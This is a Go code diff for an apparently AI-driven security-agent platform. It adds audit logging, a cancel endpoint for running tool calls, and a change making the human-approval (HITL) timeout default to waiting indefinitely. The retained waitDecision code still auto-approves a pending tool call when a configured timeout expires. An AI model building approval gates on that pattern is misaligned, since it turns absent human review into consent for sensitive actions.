mcpIDsJSON = string(jsonData)
}
_, _ = h.db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
result.Response,
mcpIDsJSON,
prep.AssistantMessageID,
)
} }
if result.LastReActInput != "" || result.LastReActOutput != "" { if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
_ = h.db.SaveReActData(prep.ConversationID, result.LastReActInput, result.LastReActOutput) _ = h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput)
} }
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
+27
View File
@@ -6,6 +6,7 @@ import (
"os" "os"
"sync" "sync"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
@@ -20,9 +21,15 @@ type ExternalMCPHandler struct {
config *config.Config config *config.Config
configPath string configPath string
logger *zap.Logger logger *zap.Logger
audit *audit.Service
mu sync.RWMutex mu sync.RWMutex
} }
// SetAudit wires platform audit logging.
func (h *ExternalMCPHandler) SetAudit(s *audit.Service) {
h.audit = s
}
// NewExternalMCPHandler 创建外部MCP处理器 // NewExternalMCPHandler 创建外部MCP处理器
func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config, configPath string, logger *zap.Logger) *ExternalMCPHandler { func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config, configPath string, logger *zap.Logger) *ExternalMCPHandler {
return &ExternalMCPHandler{ return &ExternalMCPHandler{
@@ -180,6 +187,16 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
} }
h.logger.Info("外部MCP配置已更新", zap.String("name", name)) h.logger.Info("外部MCP配置已更新", zap.String("name", name))
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "external_mcp",
Action: "upsert",
Result: "success",
ResourceType: "external_mcp",
ResourceID: name,
Message: "更新外部 MCP 配置",
})
}
c.JSON(http.StatusOK, gin.H{"message": "配置已更新"}) c.JSON(http.StatusOK, gin.H{"message": "配置已更新"})
} }
@@ -209,6 +226,16 @@ func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
} }
h.logger.Info("外部MCP配置已删除", zap.String("name", name)) h.logger.Info("外部MCP配置已删除", zap.String("name", name))
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "external_mcp",
Action: "delete",
Result: "success",
ResourceType: "external_mcp",
ResourceID: name,
Message: "删除外部 MCP 配置",
})
}
c.JSON(http.StatusOK, gin.H{"message": "配置已删除"}) c.JSON(http.StatusOK, gin.H{"message": "配置已删除"})
} }
+10 -10
View File
@@ -247,7 +247,7 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
// 先添加一个配置 // 先添加一个配置
configObj := config.ExternalMCPServerConfig{ configObj := config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
ExternalMCPEnable: true, ExternalMCPEnable: true,
} }
handler.manager.AddOrUpdateConfig("test-delete", configObj) handler.manager.AddOrUpdateConfig("test-delete", configObj)
@@ -276,11 +276,11 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
// 添加多个配置 // 添加多个配置
handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
ExternalMCPEnable: true, ExternalMCPEnable: true,
}) })
handler.manager.AddOrUpdateConfig("test2", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("test2", config.ExternalMCPServerConfig{
URL: "http://127.0.0.1:8081/mcp", URL: "http://127.0.0.1:8081/mcp",
ExternalMCPEnable: false, ExternalMCPEnable: false,
}) })
@@ -319,15 +319,15 @@ func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
// 添加配置 // 添加配置
handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
ExternalMCPEnable: true, ExternalMCPEnable: true,
}) })
handler.manager.AddOrUpdateConfig("enabled2", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("enabled2", config.ExternalMCPServerConfig{
URL: "http://127.0.0.1:8081/mcp", URL: "http://127.0.0.1:8081/mcp",
ExternalMCPEnable: true, ExternalMCPEnable: true,
}) })
handler.manager.AddOrUpdateConfig("disabled1", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("disabled1", config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
}) })
req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil) req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil)
@@ -360,7 +360,7 @@ func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
// 添加一个禁用的配置 // 添加一个禁用的配置
handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{ handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
}) })
// 测试启动(可能会失败,因为没有真实的服务器) // 测试启动(可能会失败,因为没有真实的服务器)
@@ -416,7 +416,7 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
router, _, _ := setupTestRouter() router, _, _ := setupTestRouter()
configObj := config.ExternalMCPServerConfig{ configObj := config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
ExternalMCPEnable: true, ExternalMCPEnable: true,
} }
@@ -459,14 +459,14 @@ func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
// 先添加配置 // 先添加配置
config1 := config.ExternalMCPServerConfig{ config1 := config.ExternalMCPServerConfig{
Command: "python3", Command: "python3",
ExternalMCPEnable: true, ExternalMCPEnable: true,
} }
handler.manager.AddOrUpdateConfig("test-update", config1) handler.manager.AddOrUpdateConfig("test-update", config1)
// 更新配置 // 更新配置
config2 := config.ExternalMCPServerConfig{ config2 := config.ExternalMCPServerConfig{
URL: "http://127.0.0.1:8081/mcp", URL: "http://127.0.0.1:8081/mcp",
ExternalMCPEnable: true, ExternalMCPEnable: true,
} }
+2 -2
View File
@@ -268,8 +268,8 @@ func (h *FofaHandler) ParseNaturalLanguage(c *gin.Context) {
{"role": "system", "content": systemPrompt}, {"role": "system", "content": systemPrompt},
{"role": "user", "content": userPrompt}, {"role": "user", "content": userPrompt},
}, },
"temperature": 0.1, "temperature": 0.1,
"max_tokens": 1200, "max_completion_tokens": 12000,
} }
// OpenAI 返回结构:只需要 choices[0].message.content // OpenAI 返回结构:只需要 choices[0].message.content
+35 -11
View File
@@ -85,7 +85,7 @@ CREATE TABLE IF NOT EXISTS hitl_conversation_configs (
enabled INTEGER NOT NULL DEFAULT 0, enabled INTEGER NOT NULL DEFAULT 0,
mode TEXT NOT NULL DEFAULT 'off', mode TEXT NOT NULL DEFAULT 'off',
sensitive_tools TEXT NOT NULL DEFAULT '[]', sensitive_tools TEXT NOT NULL DEFAULT '[]',
timeout_seconds INTEGER NOT NULL DEFAULT 300, timeout_seconds INTEGER NOT NULL DEFAULT 0,
updated_at DATETIME NOT NULL updated_at DATETIME NOT NULL
);`) );`)
if err != nil { if err != nil {
@@ -133,7 +133,8 @@ func (m *HITLManager) ActivateConversation(conversationID string, req *HITLReque
tools[n] = struct{}{} tools[n] = struct{}{}
} }
} }
timeout := 5 * time.Minute // timeout <= 0 means wait forever (no timeout).
timeout := time.Duration(0)
if req.TimeoutSeconds > 0 { if req.TimeoutSeconds > 0 {
timeout = time.Duration(req.TimeoutSeconds) * time.Second timeout = time.Duration(req.TimeoutSeconds) * time.Second
} }
@@ -232,6 +233,15 @@ func (m *HITLManager) shouldInterrupt(conversationID, toolName string) (hitlRunt
return cfg, !inWhitelist return cfg, !inWhitelist
} }
// NeedsToolApproval 与 Agent 工具层 shouldInterrupt 语义一致:仅当该会话已开启人机协同且工具不在免审批白名单时为 true。
func (m *HITLManager) NeedsToolApproval(conversationID, toolName string) bool {
if m == nil {
return false
}
_, need := m.shouldInterrupt(conversationID, toolName)
return need
}
func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) { func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) {
now := time.Now() now := time.Now()
id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "") id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "")
@@ -275,8 +285,8 @@ func (m *HITLManager) ensureConversationHITLModePersisted(conversationID, interr
} }
cfg.Enabled = true cfg.Enabled = true
cfg.Mode = nm cfg.Mode = nm
if cfg.TimeoutSeconds <= 0 { if cfg.TimeoutSeconds < 0 {
cfg.TimeoutSeconds = 300 cfg.TimeoutSeconds = 0
} }
return m.SaveConversationConfig(conversationID, cfg) return m.SaveConversationConfig(conversationID, cfg)
} }
@@ -341,7 +351,7 @@ func (m *HITLManager) SaveConversationConfig(conversationID string, req *HITLReq
return errors.New("conversationId is required") return errors.New("conversationId is required")
} }
if req == nil { if req == nil {
req = &HITLRequest{Enabled: false, Mode: "off", TimeoutSeconds: 300} req = &HITLRequest{Enabled: false, Mode: "off", TimeoutSeconds: 0}
} }
mode := normalizeHitlMode(req.Mode) mode := normalizeHitlMode(req.Mode)
if !req.Enabled { if !req.Enabled {
@@ -349,8 +359,8 @@ func (m *HITLManager) SaveConversationConfig(conversationID string, req *HITLReq
} }
tools, _ := json.Marshal(req.SensitiveTools) tools, _ := json.Marshal(req.SensitiveTools)
timeout := req.TimeoutSeconds timeout := req.TimeoutSeconds
if timeout <= 0 { if timeout < 0 {
timeout = 300 timeout = 0
} }
_, err := m.db.Exec(`INSERT INTO hitl_conversation_configs _, err := m.db.Exec(`INSERT INTO hitl_conversation_configs
(conversation_id, enabled, mode, sensitive_tools, timeout_seconds, updated_at) (conversation_id, enabled, mode, sensitive_tools, timeout_seconds, updated_at)
@@ -368,11 +378,14 @@ func (m *HITLManager) LoadConversationConfig(conversationID string) (*HITLReques
err := m.db.QueryRow(`SELECT enabled, mode, sensitive_tools, timeout_seconds FROM hitl_conversation_configs WHERE conversation_id = ?`, conversationID). err := m.db.QueryRow(`SELECT enabled, mode, sensitive_tools, timeout_seconds FROM hitl_conversation_configs WHERE conversation_id = ?`, conversationID).
Scan(&enabledInt, &mode, &toolsJSON, &timeout) Scan(&enabledInt, &mode, &toolsJSON, &timeout)
if errors.Is(err, sql.ErrNoRows) { if errors.Is(err, sql.ErrNoRows) {
return &HITLRequest{Enabled: false, Mode: "off", SensitiveTools: []string{}, TimeoutSeconds: 300}, nil return &HITLRequest{Enabled: false, Mode: "off", SensitiveTools: []string{}, TimeoutSeconds: 0}, nil
} }
if err != nil { if err != nil {
return nil, err return nil, err
} }
if timeout < 0 {
timeout = 0
}
tools := make([]string, 0) tools := make([]string, 0)
_ = json.Unmarshal([]byte(toolsJSON), &tools) _ = json.Unmarshal([]byte(toolsJSON), &tools)
return &HITLRequest{ return &HITLRequest{
@@ -389,6 +402,12 @@ func (m *HITLManager) waitDecision(ctx context.Context, p *pendingInterrupt, tim
delete(m.pending, p.InterruptID) delete(m.pending, p.InterruptID)
m.mu.Unlock() m.mu.Unlock()
}() }()
var timeoutCh <-chan time.Time
if timeout > 0 {
timer := time.NewTimer(timeout)
defer timer.Stop()
timeoutCh = timer.C
}
select { select {
case d := <-p.decideCh: case d := <-p.decideCh:
// 只有 review_edit 模式允许改参;其他模式一律忽略 edited arguments // 只有 review_edit 模式允许改参;其他模式一律忽略 edited arguments
@@ -398,7 +417,7 @@ func (m *HITLManager) waitDecision(ctx context.Context, p *pendingInterrupt, tim
_, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='decided', decision=?, decision_comment=?, decided_at=? WHERE id=?`, _, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='decided', decision=?, decision_comment=?, decided_at=? WHERE id=?`,
d.Decision, d.Comment, time.Now(), p.InterruptID) d.Decision, d.Comment, time.Now(), p.InterruptID)
return d, nil return d, nil
case <-time.After(timeout): case <-timeoutCh:
_, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='approve', decision_comment='timeout auto approve', decided_at=? WHERE id=?`, _, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='approve', decision_comment='timeout auto approve', decided_at=? WHERE id=?`,
time.Now(), p.InterruptID) time.Now(), p.InterruptID)
return hitlDecision{Decision: "approve", Comment: "timeout auto approve"}, nil return hitlDecision{Decision: "approve", Comment: "timeout auto approve"}, nil
@@ -597,6 +616,11 @@ func (h *AgentHandler) DecideHITLInterrupt(c *gin.Context) {
c.JSON(http.StatusConflict, gin.H{"error": err.Error()}) c.JSON(http.StatusConflict, gin.H{"error": err.Error()})
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "hitl", "decision", "HITL 审批决策", "hitl_interrupt", req.InterruptID, map[string]interface{}{
"decision": req.Decision,
})
}
c.JSON(http.StatusOK, gin.H{"ok": true}) c.JSON(http.StatusOK, gin.H{"ok": true})
} }
@@ -718,8 +742,8 @@ func (h *AgentHandler) GetHITLConversationConfig(c *gin.Context) {
cfg2 := *cfg cfg2 := *cfg
cfg2.Enabled = true cfg2.Enabled = true
cfg2.Mode = normalizeHitlMode(pendMode) cfg2.Mode = normalizeHitlMode(pendMode)
if cfg2.TimeoutSeconds <= 0 { if cfg2.TimeoutSeconds < 0 {
cfg2.TimeoutSeconds = 300 cfg2.TimeoutSeconds = 0
} }
cfg = &cfg2 cfg = &cfg2
} }
+13
View File
@@ -6,6 +6,7 @@ import (
"net/http" "net/http"
"time" "time"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/knowledge" "cyberstrike-ai/internal/knowledge"
@@ -20,6 +21,12 @@ type KnowledgeHandler struct {
indexer *knowledge.Indexer indexer *knowledge.Indexer
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *KnowledgeHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewKnowledgeHandler 创建新的知识库处理器 // NewKnowledgeHandler 创建新的知识库处理器
@@ -303,6 +310,9 @@ func (h *KnowledgeHandler) DeleteItem(c *gin.Context) {
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "knowledge", "item_delete", "删除知识项", "knowledge_item", id, nil)
}
c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
} }
@@ -316,6 +326,9 @@ func (h *KnowledgeHandler) RebuildIndex(c *gin.Context) {
} }
}() }()
if h.audit != nil {
h.audit.RecordOK(c, "knowledge", "index_rebuild", "重建知识库索引", "knowledge", "", nil)
}
c.JSON(http.StatusOK, gin.H{"message": "索引重建已开始,将在后台进行"}) c.JSON(http.StatusOK, gin.H{"message": "索引重建已开始,将在后台进行"})
} }
+27 -11
View File
@@ -9,6 +9,7 @@ import (
"strings" "strings"
"cyberstrike-ai/internal/agents" "cyberstrike-ai/internal/agents"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
@@ -18,7 +19,8 @@ var markdownAgentFilenameRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_.-]*\.m
// MarkdownAgentsHandler 管理 agents 目录下子代理 Markdown(增删改查)。 // MarkdownAgentsHandler 管理 agents 目录下子代理 Markdown(增删改查)。
type MarkdownAgentsHandler struct { type MarkdownAgentsHandler struct {
dir string dir string
audit *audit.Service
} }
// NewMarkdownAgentsHandler dir 须为已解析的绝对路径。 // NewMarkdownAgentsHandler dir 须为已解析的绝对路径。
@@ -26,6 +28,11 @@ func NewMarkdownAgentsHandler(dir string) *MarkdownAgentsHandler {
return &MarkdownAgentsHandler{dir: strings.TrimSpace(dir)} return &MarkdownAgentsHandler{dir: strings.TrimSpace(dir)}
} }
// SetAudit wires platform audit logging.
func (h *MarkdownAgentsHandler) SetAudit(s *audit.Service) {
h.audit = s
}
func (h *MarkdownAgentsHandler) safeJoin(filename string) (string, error) { func (h *MarkdownAgentsHandler) safeJoin(filename string) (string, error) {
filename = strings.TrimSpace(filename) filename = strings.TrimSpace(filename)
if filename == "" || !markdownAgentFilenameRe.MatchString(filename) { if filename == "" || !markdownAgentFilenameRe.MatchString(filename) {
@@ -131,16 +138,16 @@ func (h *MarkdownAgentsHandler) GetMarkdownAgent(c *gin.Context) {
} }
type markdownAgentBody struct { type markdownAgentBody struct {
Filename string `json:"filename"` Filename string `json:"filename"`
ID string `json:"id"` ID string `json:"id"`
Name string `json:"name"` Name string `json:"name"`
Description string `json:"description"` Description string `json:"description"`
Tools []string `json:"tools"` Tools []string `json:"tools"`
Instruction string `json:"instruction"` Instruction string `json:"instruction"`
BindRole string `json:"bind_role"` BindRole string `json:"bind_role"`
MaxIterations int `json:"max_iterations"` MaxIterations int `json:"max_iterations"`
Kind string `json:"kind"` Kind string `json:"kind"`
Raw string `json:"raw"` Raw string `json:"raw"`
} }
// CreateMarkdownAgent POST /api/multi-agent/markdown-agents // CreateMarkdownAgent POST /api/multi-agent/markdown-agents
@@ -227,6 +234,9 @@ func (h *MarkdownAgentsHandler) CreateMarkdownAgent(c *gin.Context) {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "agent", "markdown_create", "创建 Markdown 子代理", "markdown_agent", filepath.Base(path), nil)
}
c.JSON(http.StatusOK, gin.H{"filename": filepath.Base(path), "message": "已创建"}) c.JSON(http.StatusOK, gin.H{"filename": filepath.Base(path), "message": "已创建"})
} }
@@ -294,6 +304,9 @@ func (h *MarkdownAgentsHandler) UpdateMarkdownAgent(c *gin.Context) {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "agent", "markdown_update", "更新 Markdown 子代理", "markdown_agent", filename, nil)
}
c.JSON(http.StatusOK, gin.H{"message": "已保存"}) c.JSON(http.StatusOK, gin.H{"message": "已保存"})
} }
@@ -313,5 +326,8 @@ func (h *MarkdownAgentsHandler) DeleteMarkdownAgent(c *gin.Context) {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "agent", "markdown_delete", "删除 Markdown 子代理", "markdown_agent", filename, nil)
}
c.JSON(http.StatusOK, gin.H{"message": "已删除"}) c.JSON(http.StatusOK, gin.H{"message": "已删除"})
} }
+58 -10
View File
@@ -1,11 +1,15 @@
package handler package handler
import ( import (
"encoding/json"
"errors"
"io"
"net/http" "net/http"
"strconv" "strconv"
"strings" "strings"
"time" "time"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
@@ -20,6 +24,12 @@ type MonitorHandler struct {
executor *security.Executor executor *security.Executor
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *MonitorHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewMonitorHandler 创建新的监控处理器 // NewMonitorHandler 创建新的监控处理器
@@ -42,11 +52,11 @@ func (h *MonitorHandler) SetExternalMCPManager(mgr *mcp.ExternalMCPManager) {
type MonitorResponse struct { type MonitorResponse struct {
Executions []*mcp.ToolExecution `json:"executions"` Executions []*mcp.ToolExecution `json:"executions"`
Stats map[string]*mcp.ToolStats `json:"stats"` Stats map[string]*mcp.ToolStats `json:"stats"`
Timestamp time.Time `json:"timestamp"` Timestamp time.Time `json:"timestamp"`
Total int `json:"total,omitempty"` Total int `json:"total,omitempty"`
Page int `json:"page,omitempty"` Page int `json:"page,omitempty"`
PageSize int `json:"page_size,omitempty"` PageSize int `json:"page_size,omitempty"`
TotalPages int `json:"total_pages,omitempty"` TotalPages int `json:"total_pages,omitempty"`
} }
// Monitor 获取监控信息 // Monitor 获取监控信息
@@ -213,7 +223,6 @@ func (h *MonitorHandler) loadStats() map[string]*mcp.ToolStats {
return stats return stats
} }
// GetExecution 获取特定执行记录 // GetExecution 获取特定执行记录
func (h *MonitorHandler) GetExecution(c *gin.Context) { func (h *MonitorHandler) GetExecution(c *gin.Context) {
id := c.Param("id") id := c.Param("id")
@@ -246,6 +255,37 @@ func (h *MonitorHandler) GetExecution(c *gin.Context) {
c.JSON(http.StatusNotFound, gin.H{"error": "执行记录未找到"}) c.JSON(http.StatusNotFound, gin.H{"error": "执行记录未找到"})
} }
// CancelExecution 手动取消进行中的 MCP 工具调用(仅取消该次 tools/call 的上下文,不停止整条 Agent / 迭代任务)
// 请求体可选 JSON{ "note": "用户说明" },将与工具已返回输出合并交给模型(含「用户终止说明」标题块,与命令行原文区分)。
func (h *MonitorHandler) CancelExecution(c *gin.Context) {
id := c.Param("id")
if id == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"})
return
}
note := ""
dec := json.NewDecoder(c.Request.Body)
var body struct {
Note string `json:"note"`
}
if err := dec.Decode(&body); err != nil && !errors.Is(err, io.EOF) {
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体须为 JSON,例如 {\"note\":\"说明\"},可为空对象"})
return
}
note = strings.TrimSpace(body.Note)
if h.mcpServer.CancelToolExecutionWithNote(id, note) {
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "internal"), zap.Bool("hasNote", note != ""))
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
return
}
if h.externalMCPMgr != nil && h.externalMCPMgr.CancelToolExecutionWithNote(id, note) {
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "external"), zap.Bool("hasNote", note != ""))
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
return
}
c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行,或该任务已结束"})
}
// BatchGetToolNames 批量获取工具执行的工具名称(消除前端 N+1 请求) // BatchGetToolNames 批量获取工具执行的工具名称(消除前端 N+1 请求)
func (h *MonitorHandler) BatchGetToolNames(c *gin.Context) { func (h *MonitorHandler) BatchGetToolNames(c *gin.Context) {
var req struct { var req struct {
@@ -318,7 +358,7 @@ func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
totalCalls := 1 totalCalls := 1
successCalls := 0 successCalls := 0
failedCalls := 0 failedCalls := 0
if exec.Status == "failed" { if exec.Status == "failed" || exec.Status == "cancelled" {
failedCalls = 1 failedCalls = 1
} else if exec.Status == "completed" { } else if exec.Status == "completed" {
successCalls = 1 successCalls = 1
@@ -332,6 +372,11 @@ func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
} }
h.logger.Info("执行记录已从数据库删除", zap.String("executionId", id), zap.String("toolName", exec.ToolName)) h.logger.Info("执行记录已从数据库删除", zap.String("executionId", id), zap.String("toolName", exec.ToolName))
if h.audit != nil {
h.audit.RecordOK(c, "tool", "execution_delete", "删除工具执行记录", "tool_execution", id, map[string]interface{}{
"tool_name": exec.ToolName,
})
}
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除"}) c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除"})
return return
} }
@@ -382,7 +427,7 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
stats := toolStats[exec.ToolName] stats := toolStats[exec.ToolName]
stats.totalCalls++ stats.totalCalls++
if exec.Status == "failed" { if exec.Status == "failed" || exec.Status == "cancelled" {
stats.failedCalls++ stats.failedCalls++
} else if exec.Status == "completed" { } else if exec.Status == "completed" {
stats.successCalls++ stats.successCalls++
@@ -407,6 +452,11 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
} }
h.logger.Info("批量删除执行记录成功", zap.Int("count", len(request.IDs))) h.logger.Info("批量删除执行记录成功", zap.Int("count", len(request.IDs)))
if h.audit != nil {
h.audit.RecordOK(c, "tool", "execution_delete_batch", "批量删除工具执行记录", "tool_execution", "", map[string]interface{}{
"count": len(request.IDs),
})
}
c.JSON(http.StatusOK, gin.H{"message": "成功删除执行记录", "deleted": len(executions)}) c.JSON(http.StatusOK, gin.H{"message": "成功删除执行记录", "deleted": len(executions)})
return return
} }
@@ -416,5 +466,3 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs))) h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"}) c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
} }
+185 -68
View File
@@ -11,6 +11,7 @@ import (
"time" "time"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/multiagent" "cyberstrike-ai/internal/multiagent"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
@@ -60,8 +61,11 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
sendEvent := func(eventType, message string, data interface{}) { sendEvent := func(eventType, message string, data interface{}) {
// 用户主动停止时,Eino 可能仍会并发上报 eventType=="error"。 // 用户主动停止时,Eino 可能仍会并发上报 eventType=="error"。
// 为避免 UI 看到“取消错误 + cancelled 文案”两条回复,这里直接丢弃取消对应的 error。 // 为避免 UI 看到“取消错误 + cancelled 文案”两条回复,这里直接丢弃取消对应的 error。
if eventType == "error" && baseCtx != nil && errors.Is(context.Cause(baseCtx), ErrTaskCancelled) { if eventType == "error" && baseCtx != nil {
return cause := context.Cause(baseCtx)
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
return
}
} }
ev := StreamEvent{Type: eventType, Message: message, Data: data} ev := StreamEvent{Type: eventType, Message: message, Data: data}
b, errMarshal := json.Marshal(ev) b, errMarshal := json.Marshal(ev)
@@ -103,7 +107,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
zap.String("conversationId", req.ConversationID), zap.String("conversationId", req.ConversationID),
) )
prep, err := h.prepareMultiAgentSession(&req) prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent_stream")
if err != nil { if err != nil {
sendEvent("error", err.Error(), nil) sendEvent("error", err.Error(), nil)
sendEvent("done", "", nil) sendEvent("done", "", nil)
@@ -130,15 +134,35 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
}) })
} }
baseCtx, cancelWithCause := context.WithCancelCause(context.Background()) var cancelWithCause context.CancelCauseFunc
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) curFinalMessage := prep.FinalMessage
defer timeoutCancel() curHistory := prep.History
defer cancelWithCause(nil) roleTools := prep.RoleTools
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent) orch := strings.TrimSpace(req.Orchestration)
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments) taskStatus := "completed"
// 仅在成功 StartTask 后再 FinishTask;避免「任务已存在」分支 return 时误删正在运行的同会话任务。
taskOwned := false
defer func() {
if taskOwned {
h.tasks.FinishTask(conversationID, taskStatus)
}
}()
sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{
"conversationId": conversationID,
}) })
stopKeepalive := make(chan struct{})
go sseKeepalive(c, stopKeepalive, &sseWriteMu)
defer close(stopKeepalive)
var result *multiagent.RunResult
var runErr error
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil { if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
var errorMsg string var errorMsg string
if errors.Is(err, ErrTaskAlreadyRunning) { if errors.Is(err, ErrTaskAlreadyRunning) {
@@ -152,46 +176,96 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
sendEvent("error", errorMsg, nil) sendEvent("error", errorMsg, nil)
} }
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errorMsg, assistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
} }
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
timeoutCancel()
return return
} }
taskOwned = true
taskStatus := "completed" // 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
defer h.tasks.FinishTask(conversationID, taskStatus) var cumulativeMCPExecutionIDs []string
sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{ for {
"conversationId": conversationID, progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
}) taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
